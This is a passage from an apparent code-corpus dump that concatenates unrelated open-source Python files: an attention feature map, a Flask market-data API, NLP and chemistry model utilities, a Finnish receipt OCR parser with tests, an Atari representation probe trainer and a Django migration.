"""Encode x using this feature map. For symmetric feature maps it
suffices to define this function, but for asymmetric feature maps one
needs to define the `forward_queries` and `forward_keys` functions."""
raise NotImplementedError()
@classmethod
def factory(cls, *args, **kwargs):
"""Return a function that when called with the query dimensions returns
an instance of this feature map.
It is inherited by the subclasses so it is available in all feature
maps.
"""
def inner(query_dims):
return cls(query_dims, *args, **kwargs)
return inner
class ActivationFunctionFeatureMap(FeatureMap):
"""Define a feature map that is simply an element-wise activation
function."""
def __init__(self, query_dims, activation_function):
super().__init__(query_dims)
self.activation_function = activation_function
def new_feature_map(self, device):
return
def forward(self, x):
return self.activation_function(x)
elu_feature_map = ActivationFunctionFeatureMap.factory(
lambda x: torch.nn.functional.elu(x) + 1
)
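# --- Illustrative usage (editor's sketch, not part of the original module) ---
# The factory pattern documented above lets attention layers receive a callable
# and defer feature-map instantiation until the query dimensionality is known.
# A minimal, hedged demo; the tensor shape below is an arbitrary assumption.
if __name__ == "__main__":
    query_dims = 64
    feature_map = elu_feature_map(query_dims)      # factory -> FeatureMap instance
    feature_map.new_feature_map(torch.device("cpu"))
    queries = torch.randn(2, 10, query_dims)       # (batch, sequence, dims), assumed layout
    print(feature_map.forward_queries(queries).shape)  # torch.Size([2, 10, 64])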
|
fooltrader/rest/controller/tech.py
|
beaquant/fooltrader
| 1,103 |
85249
|
<filename>fooltrader/rest/controller/tech.py<gh_stars>1000+
# -*- coding: utf-8 -*-
from flask import request
from fooltrader.api.esapi import esapi
from fooltrader.rest import app
from fooltrader.rest.common import success, get_request_params_as_list
@app.route('/tech/kdata/<securityid>', methods=['GET'])
def get_kdata(securityid):
the_date = request.args.get('the_date')
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
level = request.args.get('level', 'day')
fields = request.args.get('fields')
if not fields:
fields = ['timestamp', 'open', 'high', 'low', 'close', 'volume']
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 500)
result = esapi.es_get_kdata(security_item=securityid, the_date=the_date, start_date=start_date,
end_date=end_date, fields=fields, csv=True,
level=level, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/statistic/<securityid>', methods=['GET'])
def get_statistic(securityid):
the_date = request.args.get('the_date')
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
level = request.args.get('level', 'day')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 500)
result = esapi.es_get_statistic(security_item=securityid, the_date=the_date, start_date=start_date,
end_date=end_date, level=level, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/user_statistic/<main_chain>', defaults={'user_id': None}, methods=['GET'])
@app.route('/tech/user_statistic/<main_chain>/<user_id>', methods=['GET'])
def get_user_statistic(main_chain, user_id):
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
security_id = request.args.get('security_id', 'cryptocurrency_contract_RAM-EOS')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 100)
result = esapi.es_get_user_statistic(main_chain=main_chain, security_id=security_id, user_id=user_id,
start_date=start_date,
end_date=end_date, from_idx=int(from_idx), size=int(size))
return success(result)
@app.route('/tech/account/<main_chain>', defaults={'user_id': None}, methods=['GET'])
@app.route('/tech/account/<main_chain>/<user_id>', methods=['GET'])
def get_accounts(main_chain, user_id):
start_vol = request.args.get('start_vol')
end_vol = request.args.get('end_vol')
from_idx = request.args.get('from_idx', 0)
size = request.args.get('size', 100)
order = request.args.get('order', 'totalEos')
fields = get_request_params_as_list(request, 'fields')
result = esapi.es_get_accounts(main_chain=main_chain, user_id=user_id,
start_vol=int(start_vol), fields=fields,
end_vol=int(end_vol), from_idx=int(from_idx), size=int(size), order=order)
return success(result)
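# --- Illustrative usage (editor's note, not part of the original module) ---
# Assuming the Flask app is running (the ids and parameter values below are
# illustrative assumptions), the routes above can be exercised with plain GET
# requests, with query parameters mapping directly onto the request.args lookups:
#   GET /tech/kdata/<securityid>?start_date=2018-01-01&level=day&size=100
#   GET /tech/statistic/<securityid>?level=day
#   GET /tech/account/eos?order=totalEos&size=10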
|
models/__init__.py
|
tuzhucheng/sent-sim
| 109 |
85287
|
<reponame>tuzhucheng/sent-sim
import numpy as np
import torch
from models.sentence_embedding_baseline import SmoothInverseFrequencyBaseline
from models.mpcnn import MPCNN
from models.mpcnn_lite import MPCNNLite
from models.bimpm import BiMPM
def get_model(args, dataset_cls, embedding):
if args.model == 'sif':
args.supervised = not args.unsupervised
args.remove_special_direction = not args.no_remove_special_direction
model = SmoothInverseFrequencyBaseline(dataset_cls.num_classes, args.alpha, embedding,
remove_special_direction=args.remove_special_direction,
frequency_dataset=args.frequency_dataset,
supervised=args.supervised)
elif args.model == 'mpcnn':
model = MPCNN(embedding, 300, 300, 20, [1, 2, 3, np.inf], 150, dataset_cls.num_classes, 0.5)
elif args.model == 'mpcnn-lite':
model = MPCNNLite(embedding, 300, 300, [1, 2, 3, np.inf], 150, dataset_cls.num_classes, 0.5)
elif args.model == 'bimpm':
model = BiMPM(embedding, 300, 50, 20, 100, dataset_cls.num_classes, 0.1)
else:
        raise ValueError(f'Unrecognized model: {args.model}')
if args.device != -1:
with torch.cuda.device(args.device):
model = model.cuda()
return model
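# --- Illustrative usage (editor's sketch, not part of the original module) ---
# get_model dispatches purely on args.model. The caller supplies an argparse
# namespace, a dataset class exposing num_classes, and an embedding module;
# the helper names below are assumptions about the surrounding training script.
#
#   args = parse_args()                              # e.g. --model mpcnn --device -1
#   dataset_cls, embedding, data_loaders = load_dataset(args)
#   model = get_model(args, dataset_cls, embedding)  # returns a torch.nn.Module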
|
app/modules/ocr_utils/receiptparser.py
|
jasalt/kuittiskanneri
| 131 |
85321
|
<filename>app/modules/ocr_utils/receiptparser.py
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
from functools import reduce  # reduce is a builtin only on Python 2; needed for parse_product_line
testtext = u"""
k-supermarket länsiväylä
puh. 01042 33900
4 k4 m000004/1939 21:01 28-05-2014
sallinen maapähkinä lkg 4.40
valio rasvaton maito 1,51 1.55
elonen ruisevas 540g 9kpl 1.59
pirkka banaani 0.75
es tonnikalahiutale 185/1409 vedessä 0.79
pirkka maksamakkara 300g 1.00
yhteensä 10.08
korttitapahtuma
kortti visa electron
*mu: *n* *m* 7956 cp
sovellus la us: a000oo00032010
tap.nro/varmennus 00942/151372
yritys/ala 020327326100/5411
autbnt1901ntli cf70d1e6903fcb8a
visa he: 1405223010942
debit/veloitus 10,03 eur
alv veroton vero verollinen
2 14.00% 8.84 1.24 10.08
yhteensä 8.84 1.24 10.08"""
def parse_float(txt):
""" Returns None or parsed float value. """
# Floats must have decimal point
if txt.find('.') == -1:
return None
# Parse float using python's built-in converter
try:
return float(txt)
except ValueError:
return None
def parse_date(txt):
""" Returns None or parsed date as {h, m, D, M, Y}. """
date = None
clock = None
for word in txt.split(' '):
if date is None:
try:
date = datetime.strptime(word, "%d-%m-%Y")
continue
except ValueError:
pass
try:
date = datetime.strptime(word, "%d.%m.%Y")
continue
except ValueError:
pass
if clock is None:
try:
clock = datetime.strptime(word, "%H:%M")
continue
except ValueError:
pass
if date is not None and clock is not None:
return {'h': clock.hour,
'm': clock.minute,
'D': date.day,
'M': date.month,
'Y': date.year}
return None
def parse_product_line(txt):
""" Returns None or {name, price}
Example: { name:'<NAME>', price: 0.75 }
"""
invalid_starts = ['yhtee', 'k-plussa', 'plussaa']
words = txt.split(' ')
if len(words) >= 2:
# Lines starting with any of invalid_starts are not products
if not any([words[0].startswith(s) for s in invalid_starts]):
# Price is the last word of the line
price = parse_float(words[-1])
if price is not None:
product_name = ' '.join(words[0:-1])
# Calculate percentage of digits in product_name
number_acc = lambda acc, c: acc + (1 if c.isdigit() else 0)
characters = float(len(product_name))
digit_percent = reduce(number_acc, product_name, 0) / characters
# Names with over 50% digits are not product names
if digit_percent > 0.5:
return None
return {'name': product_name, 'price': float("{0:.2f}".format(price))}
return None
def parse_sum(txt):
""" Returns None or total sum as float. """
words = txt.split(' ')
if len(words) >= 2:
if words[0].startswith('yhtee'):
# Try float parsing
total_sum = parse_float(words[-1])
if total_sum is not None:
# Return sum with 2 decimal precision
return float("{0:.2f}".format(total_sum))
return None
def parse_credit_card(txt):
""" Returns None or True. """
if txt.startswith('korttitapahtuma'):
return True
return None
def preprocess(txt):
""" Removes empty lines and unnecessary whitespace. """
return [line.strip() for line in txt.splitlines() if line.strip() != ""]
def parse_receipt(txt):
""" Parses receipt and returns parsed data. """
result = { 'products': [],
'date': None,
'total_sum': None,
'shop_name': None,
'credit_card': False }
preprocessed_lines = preprocess(txt)
if len(preprocessed_lines) == 0:
return result
result['shop_name'] = preprocessed_lines[0]
for line in preprocessed_lines:
parsed_product = parse_product_line(line)
if parsed_product is not None:
result['products'].append(parsed_product)
parsed_sum = parse_sum(line)
if parsed_sum is not None:
result['total_sum'] = parsed_sum
parsed_card = parse_credit_card(line)
if parsed_card is not None:
result['credit_card'] = parsed_card
parsed_date = parse_date(line)
if parsed_date is not None:
result['date'] = parsed_date
return result
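# --- Illustrative usage (editor's note, not part of the original module) ---
# Running the sample OCR text at the top of this file through the parser yields
# a dict of the shape below (product list abbreviated):
#   parse_receipt(testtext)
#   => {'shop_name': u'k-supermarket länsiväylä',
#       'date': {'h': 21, 'm': 1, 'D': 28, 'M': 5, 'Y': 2014},
#       'total_sum': 10.08,
#       'credit_card': True,
#       'products': [{'name': ..., 'price': ...}, ...]}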
class ParserTest(unittest.TestCase):
""" Tests all receipt parser functions. """
def test_float(self):
""" Tests parse_float """
test = lambda inp, expected:\
self.assertEqual(parse_float(inp), expected)
# Valid floats
test('0.00', 0.0)
test('13.75', 13.75)
test(u'0.05', 0.05)
# Invalid floats
test('', None)
test(' ', None)
test('abc', None)
def test_product_line(self):
""" Tests parse_product_line """
test = lambda inp, expected:\
self.assertEqual(parse_product_line(inp), expected)
# Valid product lines
test('valio rasvaton maito 1,5l 1.55', \
{'name': 'valio rasvaton maito 1,5l', 'price': 1.55})
test('pirkka maksamakkara 300g 1.00', \
{'name': 'pirkka maksamakkara 300g', 'price': 1.00})
test(u'sallinen maapähkinä 1kg 4.40', \
{'name': u'sallinen maapähkinä 1kg', 'price': 4.4})
# Invalid product lines
test('4 k4 m000004/1939 21:01 28-05-2014', None)
test('yhteensä 8.84 1.24 10.08', None)
test('puh. 01042 33900', None)
test(u'korttitapahtuma', None)
test("2 14.0q% 9.95 1.39 11.34", None)
def test_sum(self):
""" Tests parse_sum """
test = lambda inp, expected:\
self.assertEqual(parse_sum(inp), expected)
# Valid sums
test(u'yhteensä 15.62', 15.62)
test(u'yhteensä 61.00', 61.00)
# Invalid sums
test(u'yhteensä 6i 00', None)
test('', None)
def test_date(self):
""" Tests parse_date """
test = lambda inp, expected:\
self.assertEqual(parse_date(inp), expected)
# Valid dates
test('15:57 27-07-2014', {'h':15,'m':57, 'D':27,'M':7,'Y':2014})
test('16.07.2014 23:15', {'h':23,'m':15, 'D':16,'M':7,'Y':2014})
# Invalid dates
test('64:99 12-13-2014', None)
test('abc', None)
test(' ', None)
test('', None)
if __name__ == '__main__':
unittest.main()
|
python/dgllife/data/csv_dataset.py
|
siboehm/dgl-lifesci
| 390 |
85369
|
<filename>python/dgllife/data/csv_dataset.py
# -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Creating datasets from .csv files for molecular property prediction.
import dgl.backend as F
import numpy as np
import os
import pandas as pd
import torch
from dgl.data.utils import save_graphs, load_graphs
from ..utils.io import pmap
__all__ = ['MoleculeCSVDataset']
class MoleculeCSVDataset(object):
"""MoleculeCSVDataset
This is a general class for loading molecular data from :class:`pandas.DataFrame`.
In data pre-processing, we construct a binary mask indicating the existence of labels.
All molecules are converted into DGLGraphs. After the first-time construction, the
DGLGraphs can be saved for reloading so that we do not need to reconstruct them every time.
Parameters
----------
df: pandas.DataFrame
Dataframe including smiles and labels. Can be loaded by pandas.read_csv(file_path).
One column includes smiles and some other columns include labels.
smiles_to_graph: callable, str -> DGLGraph
A function turning a SMILES string into a DGLGraph.
node_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
smiles_column: str
Column name for smiles in ``df``.
cache_file_path: str
Path to store the preprocessed DGLGraphs. For example, this can be ``'dglgraph.bin'``.
task_names : list of str or None, optional
Columns in the data frame corresponding to real-valued labels. If None, we assume
all columns except the smiles_column are labels. Default to None.
load : bool, optional
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to False.
    log_every : int, optional
        Print a message every time ``log_every`` molecules are processed. It only comes
        into effect when :attr:`n_jobs` is 1. Default to 1000.
init_mask : bool, optional
Whether to initialize a binary mask indicating the existence of labels. Default to True.
n_jobs : int, optional
The maximum number of concurrently running jobs for graph construction and featurization,
using joblib backend. Default to 1.
error_log : str, optional
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""
def __init__(self, df, smiles_to_graph, node_featurizer, edge_featurizer, smiles_column,
cache_file_path, task_names=None, load=False, log_every=1000, init_mask=True,
n_jobs=1, error_log=None):
self.df = df
self.smiles = self.df[smiles_column].tolist()
if task_names is None:
self.task_names = self.df.columns.drop([smiles_column]).tolist()
else:
self.task_names = task_names
self.n_tasks = len(self.task_names)
self.cache_file_path = cache_file_path
self._pre_process(smiles_to_graph, node_featurizer, edge_featurizer,
load, log_every, init_mask, n_jobs, error_log)
# Only useful for binary classification tasks
self._task_pos_weights = None
def _pre_process(self, smiles_to_graph, node_featurizer, edge_featurizer,
load, log_every, init_mask, n_jobs, error_log):
"""Pre-process the dataset
* Convert molecules from smiles format into DGLGraphs
and featurize their atoms
* Set missing labels to be 0 and use a binary masking
matrix to mask them
Parameters
----------
smiles_to_graph : callable, SMILES -> DGLGraph
Function for converting a SMILES (str) into a DGLGraph.
node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
load : bool
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
            featurization methods and need to preprocess from scratch. Default to False.
        log_every : int
            Print a message every time ``log_every`` molecules are processed. It only comes
            into effect when :attr:`n_jobs` is 1.
init_mask : bool
Whether to initialize a binary mask indicating the existence of labels.
n_jobs : int
Degree of parallelism for pre processing. Default to 1.
error_log : str
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""
if os.path.exists(self.cache_file_path) and load:
# DGLGraphs have been constructed before, reload them
print('Loading previously saved dgl graphs...')
self.graphs, label_dict = load_graphs(self.cache_file_path)
self.labels = label_dict['labels']
if init_mask:
self.mask = label_dict['mask']
self.valid_ids = label_dict['valid_ids'].tolist()
else:
print('Processing dgl graphs from scratch...')
if n_jobs > 1:
self.graphs = pmap(smiles_to_graph,
self.smiles,
node_featurizer=node_featurizer,
edge_featurizer=edge_featurizer,
n_jobs=n_jobs)
else:
self.graphs = []
for i, s in enumerate(self.smiles):
if (i + 1) % log_every == 0:
print('Processing molecule {:d}/{:d}'.format(i+1, len(self)))
self.graphs.append(smiles_to_graph(s, node_featurizer=node_featurizer,
edge_featurizer=edge_featurizer))
# Keep only valid molecules
self.valid_ids = []
graphs = []
failed_mols = []
for i, g in enumerate(self.graphs):
if g is not None:
self.valid_ids.append(i)
graphs.append(g)
else:
failed_mols.append((i, self.smiles[i]))
if error_log is not None:
if len(failed_mols) > 0:
failed_ids, failed_smis = map(list, zip(*failed_mols))
else:
failed_ids, failed_smis = [], []
df = pd.DataFrame({'raw_id': failed_ids, 'smiles': failed_smis})
df.to_csv(error_log, index=False)
self.graphs = graphs
_label_values = self.df[self.task_names].values
# np.nan_to_num will also turn inf into a very large number
self.labels = F.zerocopy_from_numpy(
np.nan_to_num(_label_values).astype(np.float32))[self.valid_ids]
valid_ids = torch.tensor(self.valid_ids)
if init_mask:
self.mask = F.zerocopy_from_numpy(
(~np.isnan(_label_values)).astype(np.float32))[self.valid_ids]
save_graphs(self.cache_file_path, self.graphs,
labels={'labels': self.labels, 'mask': self.mask,
'valid_ids': valid_ids})
else:
self.mask = None
save_graphs(self.cache_file_path, self.graphs,
labels={'labels': self.labels, 'valid_ids': valid_ids})
self.smiles = [self.smiles[i] for i in self.valid_ids]
def __getitem__(self, item):
"""Get datapoint with index
Parameters
----------
item : int
Datapoint index
Returns
-------
str
SMILES for the ith datapoint
DGLGraph
DGLGraph for the ith datapoint
Tensor of dtype float32 and shape (T)
Labels of the datapoint for all tasks
Tensor of dtype float32 and shape (T), optional
Binary masks indicating the existence of labels for all tasks. This is only
generated when ``init_mask`` is True in the initialization.
"""
if self.mask is not None:
return self.smiles[item], self.graphs[item], self.labels[item], self.mask[item]
else:
return self.smiles[item], self.graphs[item], self.labels[item]
def __len__(self):
"""Size for the dataset
Returns
-------
int
Size for the dataset
"""
return len(self.smiles)
def task_pos_weights(self, indices):
"""Get weights for positive samples on each task
This should only be used when all tasks are binary classification.
It's quite common that the number of positive samples and the number of
negative samples are significantly different for binary classification.
To compensate for the class imbalance issue, we can weight each datapoint
in loss computation.
In particular, for each task we will set the weight of negative samples
to be 1 and the weight of positive samples to be the number of negative
samples divided by the number of positive samples.
Parameters
----------
indices : 1D LongTensor
The function will compute the weights on the data subset specified by
the indices, e.g. the indices for the training set.
Returns
-------
Tensor of dtype float32 and shape (T)
Weight of positive samples on all tasks
"""
task_pos_weights = torch.ones(self.labels.shape[1])
num_pos = F.sum(self.labels[indices], dim=0)
num_indices = F.sum(self.mask[indices], dim=0)
task_pos_weights[num_pos > 0] = ((num_indices - num_pos) / num_pos)[num_pos > 0]
return task_pos_weights
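# --- Illustrative usage (editor's sketch, not part of the original module) ---
# A minimal, hedged example of building the dataset from an in-memory frame.
# The column names, label values and cache path are assumptions made for the
# sketch; smiles_to_bigraph and CanonicalAtomFeaturizer come from dgllife.utils
# and require RDKit to be installed.
if __name__ == '__main__':
    from dgllife.utils import smiles_to_bigraph, CanonicalAtomFeaturizer

    example_df = pd.DataFrame({'smiles': ['CCO', 'c1ccccc1'], 'task1': [0.0, 1.0]})
    dataset = MoleculeCSVDataset(df=example_df,
                                 smiles_to_graph=smiles_to_bigraph,
                                 node_featurizer=CanonicalAtomFeaturizer(),
                                 edge_featurizer=None,
                                 smiles_column='smiles',
                                 cache_file_path='example_dglgraph.bin',
                                 task_names=['task1'])
    smiles, graph, labels, mask = dataset[0]
    print(len(dataset), graph, labels, mask)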
|
desktop/core/ext-py/nose-1.3.7/unit_tests/test_isolation_plugin.py
|
kokosing/hue
| 5,079 |
85388
|
<reponame>kokosing/hue
def test_lint():
import nose.plugins.isolate
|
demos/python/sdk_wireless_camera_control/open_gopro/wifi/adapters/__init__.py
|
Natureshadow/OpenGoPro
| 210 |
85390
|
<filename>demos/python/sdk_wireless_camera_control/open_gopro/wifi/adapters/__init__.py
# __init__.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue Sep 7 21:35:53 UTC 2021
"""Universal WiFi adapter implementation for Open GoPro WiFi interface"""
from .wireless import Wireless
|
atariari/benchmark/probe.py
|
tmoopenn/atari-representation-learning
| 175 |
85415
|
import torch
from torch import nn
from .utils import EarlyStopping, appendabledict, \
calculate_multiclass_accuracy, calculate_multiclass_f1_score,\
append_suffix, compute_dict_average
from copy import deepcopy
import numpy as np
from torch.utils.data import RandomSampler, BatchSampler
from .categorization import summary_key_dict
class LinearProbe(nn.Module):
def __init__(self, input_dim, num_classes=255):
super().__init__()
self.model = nn.Linear(in_features=input_dim, out_features=num_classes)
def forward(self, feature_vectors):
return self.model(feature_vectors)
class FullySupervisedLinearProbe(nn.Module):
def __init__(self, encoder, num_classes=255):
super().__init__()
self.encoder = deepcopy(encoder)
self.probe = LinearProbe(input_dim=self.encoder.hidden_size,
num_classes=num_classes)
def forward(self, x):
feature_vec = self.encoder(x)
return self.probe(feature_vec)
class ProbeTrainer():
def __init__(self,
encoder=None,
method_name="my_method",
wandb=None,
patience=15,
num_classes=256,
fully_supervised=False,
save_dir=".models",
device=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
lr=5e-4,
epochs=100,
batch_size=64,
representation_len=256):
self.encoder = encoder
self.wandb = wandb
self.device = device
self.fully_supervised = fully_supervised
self.save_dir = save_dir
self.num_classes = num_classes
self.epochs = epochs
self.lr = lr
self.batch_size = batch_size
self.patience = patience
self.method = method_name
self.feature_size = representation_len
self.loss_fn = nn.CrossEntropyLoss()
# bad convention, but these get set in "create_probes"
self.probes = self.early_stoppers = self.optimizers = self.schedulers = None
def create_probes(self, sample_label):
if self.fully_supervised:
assert self.encoder != None, "for fully supervised you must provide an encoder!"
self.probes = {k: FullySupervisedLinearProbe(encoder=self.encoder,
num_classes=self.num_classes).to(self.device) for k in
sample_label.keys()}
else:
self.probes = {k: LinearProbe(input_dim=self.feature_size,
num_classes=self.num_classes).to(self.device) for k in sample_label.keys()}
self.early_stoppers = {
k: EarlyStopping(patience=self.patience, verbose=False, name=k + "_probe", save_dir=self.save_dir)
for k in sample_label.keys()}
self.optimizers = {k: torch.optim.Adam(list(self.probes[k].parameters()),
eps=1e-5, lr=self.lr) for k in sample_label.keys()}
self.schedulers = {
k: torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizers[k], patience=5, factor=0.2, verbose=True,
mode='max', min_lr=1e-5) for k in sample_label.keys()}
def generate_batch(self, episodes, episode_labels):
total_steps = sum([len(e) for e in episodes])
assert total_steps > self.batch_size
print('Total Steps: {}'.format(total_steps))
# Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler = BatchSampler(RandomSampler(range(len(episodes)),
replacement=True, num_samples=total_steps),
self.batch_size, drop_last=True)
for indices in sampler:
episodes_batch = [episodes[x] for x in indices]
episode_labels_batch = [episode_labels[x] for x in indices]
xs, labels = [], appendabledict()
for ep_ind, episode in enumerate(episodes_batch):
# Get one sample from this episode
t = np.random.randint(len(episode))
xs.append(episode[t])
labels.append_update(episode_labels_batch[ep_ind][t])
yield torch.stack(xs).float().to(self.device) / 255., labels
def probe(self, batch, k):
probe = self.probes[k]
probe.to(self.device)
if self.fully_supervised:
# if method is supervised batch is a batch of frames and probe is a full encoder + linear or nonlinear probe
preds = probe(batch)
elif not self.encoder:
# if encoder is None then inputs are vectors
f = batch.detach()
assert len(f.squeeze().shape) == 2, "if input is not a batch of vectors you must specify an encoder!"
preds = probe(f)
else:
with torch.no_grad():
self.encoder.to(self.device)
f = self.encoder(batch).detach()
preds = probe(f)
return preds
def do_one_epoch(self, episodes, label_dicts):
sample_label = label_dicts[0][0]
epoch_loss, accuracy = {k + "_loss": [] for k in sample_label.keys() if
not self.early_stoppers[k].early_stop}, \
{k + "_acc": [] for k in sample_label.keys() if
not self.early_stoppers[k].early_stop}
data_generator = self.generate_batch(episodes, label_dicts)
for step, (x, labels_batch) in enumerate(data_generator):
for k, label in labels_batch.items():
if self.early_stoppers[k].early_stop:
continue
optim = self.optimizers[k]
optim.zero_grad()
label = torch.tensor(label).long().to(self.device)
preds = self.probe(x, k)
loss = self.loss_fn(preds, label)
epoch_loss[k + "_loss"].append(loss.detach().item())
preds = preds.cpu().detach().numpy()
preds = np.argmax(preds, axis=1)
label = label.cpu().detach().numpy()
accuracy[k + "_acc"].append(calculate_multiclass_accuracy(preds,
label))
if self.probes[k].training:
loss.backward()
optim.step()
epoch_loss = {k: np.mean(loss) for k, loss in epoch_loss.items()}
accuracy = {k: np.mean(acc) for k, acc in accuracy.items()}
return epoch_loss, accuracy
def do_test_epoch(self, episodes, label_dicts):
sample_label = label_dicts[0][0]
accuracy_dict, f1_score_dict = {}, {}
pred_dict, all_label_dict = {k: [] for k in sample_label.keys()}, \
{k: [] for k in sample_label.keys()}
# collect all predictions first
data_generator = self.generate_batch(episodes, label_dicts)
for step, (x, labels_batch) in enumerate(data_generator):
for k, label in labels_batch.items():
label = torch.tensor(label).long().cpu()
all_label_dict[k].append(label)
preds = self.probe(x, k).detach().cpu()
pred_dict[k].append(preds)
for k in all_label_dict.keys():
preds, labels = torch.cat(pred_dict[k]).cpu().detach().numpy(),\
torch.cat(all_label_dict[k]).cpu().detach().numpy()
preds = np.argmax(preds, axis=1)
accuracy = calculate_multiclass_accuracy(preds, labels)
f1score = calculate_multiclass_f1_score(preds, labels)
accuracy_dict[k] = accuracy
f1_score_dict[k] = f1score
return accuracy_dict, f1_score_dict
def train(self, tr_eps, val_eps, tr_labels, val_labels):
# if not self.encoder:
# assert len(tr_eps[0][0].squeeze().shape) == 2, "if input is a batch of vectors you must specify an encoder!"
sample_label = tr_labels[0][0]
self.create_probes(sample_label)
e = 0
all_probes_stopped = np.all([early_stopper.early_stop for early_stopper in self.early_stoppers.values()])
while (not all_probes_stopped) and e < self.epochs:
epoch_loss, accuracy = self.do_one_epoch(tr_eps, tr_labels)
self.log_results(e, epoch_loss, accuracy)
val_loss, val_accuracy = self.evaluate(val_eps, val_labels, epoch=e)
# update all early stoppers
for k in sample_label.keys():
if not self.early_stoppers[k].early_stop:
self.early_stoppers[k](val_accuracy["val_" + k + "_acc"], self.probes[k])
for k, scheduler in self.schedulers.items():
if not self.early_stoppers[k].early_stop:
scheduler.step(val_accuracy['val_' + k + '_acc'])
e += 1
all_probes_stopped = np.all([early_stopper.early_stop for early_stopper in self.early_stoppers.values()])
print("All probes early stopped!")
def evaluate(self, val_episodes, val_label_dicts, epoch=None):
for k, probe in self.probes.items():
probe.eval()
epoch_loss, accuracy = self.do_one_epoch(val_episodes, val_label_dicts)
epoch_loss = {"val_" + k: v for k, v in epoch_loss.items()}
accuracy = {"val_" + k: v for k, v in accuracy.items()}
self.log_results(epoch, epoch_loss, accuracy)
for k, probe in self.probes.items():
probe.train()
return epoch_loss, accuracy
def test(self, test_episodes, test_label_dicts, epoch=None):
for k in self.early_stoppers.keys():
self.early_stoppers[k].early_stop = False
for k, probe in self.probes.items():
probe.eval()
acc_dict, f1_dict = self.do_test_epoch(test_episodes, test_label_dicts)
acc_dict, f1_dict = postprocess_raw_metrics(acc_dict, f1_dict)
print("""In our paper, we report F1 scores and accuracies averaged across each category.
That is, we take a mean across all state variables in a category to get the average score for that category.
Then we average all the category averages to get the final score that we report per game for each method.
These scores are called \'across_categories_avg_acc\' and \'across_categories_avg_f1\' respectively
We do this to prevent categories with large number of state variables dominating the mean F1 score.
""")
self.log_results("Test", acc_dict, f1_dict)
return acc_dict, f1_dict
def log_results(self, epoch_idx, *dictionaries):
print("Epoch: {}".format(epoch_idx))
for dictionary in dictionaries:
for k, v in dictionary.items():
print("\t {}: {:8.4f}".format(k, v))
print("\t --")
def postprocess_raw_metrics(acc_dict, f1_dict):
acc_overall_avg, f1_overall_avg = compute_dict_average(acc_dict), \
compute_dict_average(f1_dict)
acc_category_avgs_dict, f1_category_avgs_dict = compute_category_avgs(acc_dict), \
compute_category_avgs(f1_dict)
acc_avg_across_categories, f1_avg_across_categories = compute_dict_average(acc_category_avgs_dict), \
compute_dict_average(f1_category_avgs_dict)
acc_dict.update(acc_category_avgs_dict)
f1_dict.update(f1_category_avgs_dict)
acc_dict["overall_avg"], f1_dict["overall_avg"] = acc_overall_avg, f1_overall_avg
acc_dict["across_categories_avg"], f1_dict["across_categories_avg"] = [acc_avg_across_categories,
f1_avg_across_categories]
acc_dict = append_suffix(acc_dict, "_acc")
f1_dict = append_suffix(f1_dict, "_f1")
return acc_dict, f1_dict
def compute_category_avgs(metric_dict):
category_dict = {}
for category_name, category_keys in summary_key_dict.items():
category_values = [v for k, v in metric_dict.items() if k in category_keys]
if len(category_values) < 1:
continue
category_mean = np.mean(category_values)
category_dict[category_name + "_avg"] = category_mean
return category_dict
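# --- Illustrative usage (editor's note, not part of the original module) ---
# ProbeTrainer expects, per split, a list of episodes (each an indexable
# sequence of frame or representation tensors) and a parallel list of
# per-timestep label dicts, i.e. episodes[i][t] is a tensor and
# label_dicts[i][t] is something like {'player_x': 42, 'player_y': 7}.
# A hedged sketch of the driving code (variable names are assumptions):
#
#   trainer = ProbeTrainer(encoder=encoder, representation_len=encoder.hidden_size)
#   trainer.train(tr_eps, val_eps, tr_labels, val_labels)
#   test_acc, test_f1 = trainer.test(test_eps, test_labels)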
|
tests/migrations/0001_initial.py
|
wethegit/django-modelcluster
| 278 |
85424
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import modelcluster.fields
import django.db.models.deletion
import modelcluster.contrib.taggit
class Migration(migrations.Migration):
dependencies = [
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('release_date', models.DateField(null=True, blank=True)),
('sort_order', models.IntegerField(null=True, editable=False, blank=True)),
],
options={
'ordering': ['sort_order'],
},
),
migrations.CreateModel(
name='Band',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BandMember',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
